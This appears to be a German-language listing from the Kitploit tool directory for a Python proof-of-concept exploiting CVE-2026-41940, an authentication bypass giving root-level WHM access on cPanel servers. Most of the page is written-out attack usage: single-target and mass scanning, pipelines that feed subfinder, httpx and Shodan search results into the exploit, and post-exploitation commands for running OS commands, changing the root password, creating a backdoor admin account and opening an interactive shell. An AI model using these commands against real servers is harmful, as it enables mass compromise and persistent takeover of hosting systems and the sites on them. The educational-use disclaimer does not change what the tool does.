Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
cve-2026-41940-PoC — Python-PoC, das CVE-2026-41940 ausnutzt, eine Authentifizierungsumgehung in cPanel & WHM, die unauthentifizierten WHM-Zugriff auf Root-Ebene ermöglicht, mit Scanning- und Post-Exploitation-Shell-Befehlen. | Kitploit
Tools/GitHubGitHub/yasouxken/cve-2026-41940-poc
SchwachstellenscannerExploitationWebanwendungs-ExploitationPost-ExploitationPenetrationstestsCommand and ControlAuthentifizierungRed TeamingRemote-Access-Tool
Payload-Entwicklung
GitHubyasouxken/cve-2026-41940-poc

cve-2026-41940-PoC

Python-PoC, das CVE-2026-41940 ausnutzt, eine Authentifizierungsumgehung in cPanel & WHM, die unauthentifizierten WHM-Zugriff auf Root-Ebene ermöglicht, mit Scanning- und Post-Exploitation-Shell-Befehlen.

Repository anzeigen
vor 4h 46mNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-41940

⚠ Dieses Tool wurde ausschließlich zu Bildungs- oder Bug-Bounty-Zwecken erstellt. Die unbefugte Nutzung außerhalb kontrollierter Umgebungen ist strengstens untersagt.

Beschreibung

Ein Tool zum Ausnutzen von CVE-2026-41940, einer kritischen Authentifizierungsumgehung in cPanel & WHM (CVSS 10.0), die es nicht authentifizierten Angreifern ermöglicht, Root-Level-WHM-Zugriff zu erlangen, indem CRLF-Sequenzen über den Authorization-Header in serverseitige Sitzungsdateien eingeschleust werden — ohne Anmeldedaten.

Funktionsweise

CVE-2026-41940 wird allgemein durch einen Fehler in der Art und Weise ausgenutzt, wie das System Authentifizierungssitzungen in cPanel/WHM handhabt. Der Angriff beginnt typischerweise mit einer normalen Anfrage an die Login-Oberfläche, bei der die Anwendung vorzeitig eine Sitzung initialisiert, bevor die Benutzeranmeldedaten vollständig validiert werden. Aufgrund der unsachgemäßen Behandlung sitzungsbezogener Eingaben können bestimmte manipulierte oder unerwartete Eingabestrukturen die Art und Weise verändern, wie Sitzungsdaten vom Server gespeichert oder interpretiert werden.

Betroffene Versionen

VersionAnfälligGepatcht
110.x≤ 11.110.0.9611.110.0.97
118.x≤ 11.118.0.6211.118.0.63
126.x≤ 11.126.0.5311.126.0.54
132.x≤ 11.132.0.2811.132.0.29
134.x≤ 11.134.0.1911.134.0.20
136.x≤ 11.136.0.411.136.0.5

Installation (Windows/Mac OS)🔄

root@kitploit:~
git clone https://github.com/yasouxken/CVE-2026-41940-PoC
cd CVE-2026-41940-PoC
# Windows 
python cve.py
# MacOS/Linux
python3 cve.py

Verwendung

Das Tool erwartet die Angabe einer Ziel-Domain.

Einzelziel-Modus:

root@kitploit:~
python cve.py -u https://target1.com:2083

Sie können auch aus der Datei target.txt scannen (erstellen Sie diese):

root@kitploit:~
python cve.py -l target.txt -t 50 -o result.json

Basis-Scan:

Verfügbare Befehle:

root@kitploit:~
python cve.py -u https://victim1.com:2083 # Einzelziel-Scan
python cve.py info -u https://victim1.com:2083 # Ruft Systeminformationen ab (Version, Last, Festplattennutzung).
python cve.py host -u https://victim1.com:2083 # Ruft den Hostnamen des Zielservers ab.

Post-Exploit-Aktionen

root@kitploit:~
# Alle Konten auf dem Server auflisten
python cve.py list -u https://target.com:2087

# OS-Befehl
python cve.py cmd -u https://target.com:2087 --cmd "id;whoami;uname -a"
python cve.py cmd -u https://target.com:2087 --cmd "ls /home"

# Serverinformationen abrufen (Hostname, Festplatte, MySQL-Host)
python cve.py info -u https://target.com:2087

# Root-Passwort ändern
python cve.py passwd -u https://target.com:2087 --passwd 'NewPassword1423!!@'

# Interaktive WHM-Shell
python cve.py shell -u https://target.com:2087

Pipelines

root@kitploit:~
# subfinder → httpx → cPanelSniper
subfinder -d victim.com -silent | \
  httpx -silent -ports 2085,2086 -threads 50 | \
  python cve.py scan -t 40 -o results.json

# Aus Scope-Liste
cat scope.txt | \
  httpx -silent -ports 2085,2086 -threads 100 | \
  python cve.py scan -t 30 -o results.json

# Shodan-Ergebnisse
shodan search --fields ip_str,port 'title:"WHM Login"' | \
  awk '{print "https://"$1":"$2}' | \
  python cve.py -t 30 -o shodan_results.json

# Mehrere Quellen kombiniert
{ subfinder -d victim.com -silent; cat extra.txt; } | \
  httpx -silent -ports 2087 | \
  python cve.py -t 20 --action list

WHM-Shell-Modus

Nach einer erfolgreichen Ausführung können Sie eine interaktive WHM-Shell öffnen:

root@kitploit:~
python cve.py shell -u

Alle Shell-Befehle

BefehlBeschreibung
idBenutzer-ID anzeigen
hostnameServer-Hostname abrufen
accountsAlle Benutzerkonten auflisten
infoLast, Festplatte, MySQL-Host, Version
cat <path>Dateiinhalt lesen
exec <cmd>OS-Befehl ausführen
newadmin <user> <pass>Backdoor-WHM-Admin erstellen
passwd <pass>Root-Passwort ändern
l [path]Verzeichnis auflisten
helpAlle Befehle anzeigen
exitShell-Modus beenden

CLI-Referenz

root@kitploit:~
usage: cve.py [-h] [-u URL] [-l LIST] [--hostname HOSTNAME]
                       [-t THREADS] [--timeout TIMEOUT] [--rate-limit N]
                       [--action ACTION] [--passwd PASS] [--cmd CMD]
                       [--new-user USER] [--new-domain DOMAIN]
                       [-o OUTPUT] 

Target:
  -u, --url URL          Einzelne Ziel-URL (z. B. https://host:2087)
  -l, --list LIST        Datei mit URLs (eine pro Zeile)
  --hostname HOSTNAME    Kanonischen Host-Header überschreiben (automatisch erkannt)

Scan:
  -t, --threads N        Parallele Threads (Standard: 10)
  --timeout N            Anfrage-Timeout in Sekunden (Standard: 15)
  --rate-limit N         Verzögerung zwischen Zielen (Standard: 0)
  --force                cPanel-Erkennungsprüfung überspringen

Post-Exploit:
  --action ACTION        Aktion: list | passwd | cmd | exec | info |
                                 version | shell | adduser
  --passwd PASS          Neues Root-Passwort (--action passwd)
  --cmd CMD              OS-Befehl (--action cmd/exec)
  --new-user USER        Neuer cPanel-Benutzername (--action adduser)
  --new-domain DOMAIN    Neue cPanel-Domain (--action adduser)

Output:
  -o, --output FILE      Ergebnisse in JSON-Datei speichern
  --no-color             ANSI-Farben deaktivieren

Haftungsausschluss

⚠ Dieses Tool wurde ausschließlich zu Bildungs- oder Bug-Bounty-Zwecken erstellt. Die unbefugte Nutzung außerhalb kontrollierter Umgebungen ist strengstens untersagt.

Tool herunterladen